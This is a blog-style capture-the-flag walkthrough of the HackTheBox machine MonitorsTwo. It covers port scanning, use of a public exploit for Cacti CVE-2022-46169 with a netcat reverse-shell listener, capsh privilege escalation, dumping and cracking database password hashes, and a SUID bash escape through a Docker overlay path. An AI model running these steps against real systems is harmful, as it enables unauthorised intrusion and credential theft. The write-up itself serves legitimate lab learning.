HackTheBox Writeup — MonitorsTwo

Dicky Aditrianza
3 min readMay 8, 2023

--

Hello everyone, this is my first writeup on Hackthebox machine called MonitorsTwo

So if there are errors in writing or other errors I apologize, criticism and suggestions are very welcome. Now let’s beginnn! shall we

First I do port scanning as usual using Nmap.

nmap -p- -sC -sTV --min-rate 5000 10.10.11.211

There are only 2 ports that open which are ssh and HTTP. Let’s jump into the HTTP page.

I’ve tried several default credentials like admin:admin or etc, but it didn’t work. Thus, I searched for the vulnerability on Google using the information that I got from the login page.

Hmm, it seems that the machine has a vulnerability CVE-2022–46169. Now let’s find the exploit.

https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22

I found the exploit on GitHub. The exploit was very simple, just clone the exploit and run it as it tells on the POC.

Listen to port 8888

nc -nvlp 8888

And run the exploit

I got the shell as www-data, let’s do the enumeration to gain access using Linpeas.

Found the interesting binary here, let’s take a look on gtfobins.

https://gtfobins.github.io/gtfobins/capsh/

run the command on the target machine.

capsh --gid=0 --uid=0 --

Got the root shell, but here I noticed that I still can’t get the flag on the root directory or even the home directory, now let’s do the enumeration on the database.

mysql --host=db --user=root --password=root cacti -e "select * from user_auth;"

found 3 users, let’s crack the password using john.

use the password to login to ssh as user Marcus.

Got the user flag.

Privilege Escalation

Now for the privilege escalation run chmod u+s /bin/bash on the previous shell.

back to ssh shell and run findmnt.

and run /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p

Got the root flag. Finally, we solved the machine.

--

--